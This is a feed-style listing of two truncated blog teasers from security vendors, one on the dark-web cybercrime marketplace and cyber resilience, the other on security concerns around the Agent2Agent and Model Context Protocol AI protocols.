Cyber Resilience is More Than a BuzzwordThe cybercrime marketplace is booming, and it’s running at a scale that’s hard to ignore. Today, ransomware-as-a-service, stolen credentials, and even ready-made phishing kits are just a click away on the dark web. Cybercrime has transformed into a well-oiled business ecosystem, with cybercriminals collaborating, innovating, and trading tools like any legitimate industry.  The numbers tell […] The post Cyber Resilience is More Than a Buzzword appeared first on Binary Defense.
by Binary Defense
2025-04-15 12:30:14
Cybersecurity Landscape for New AI ProtocolsCybersecurity Landscape for New AI Protocols. Security measures should become a growing concern as AI emerges with new technologies and protocols. As we all know, there are 2 new AI protocols introduced by Google and Anthropic: Agent2Agent (A2A) – By Google https://developers.googleblog.com/en/a2a-a-new-era-of-agent-interoperability/ Model Context Protocol (MCP) – By Anthropic https://www.anthropic.com/news/model-context-protocol Organisations are eager to use […] The post Cybersecurity Landscape for New AI Protocols first appeared on BlockAPT.
by BlockAPT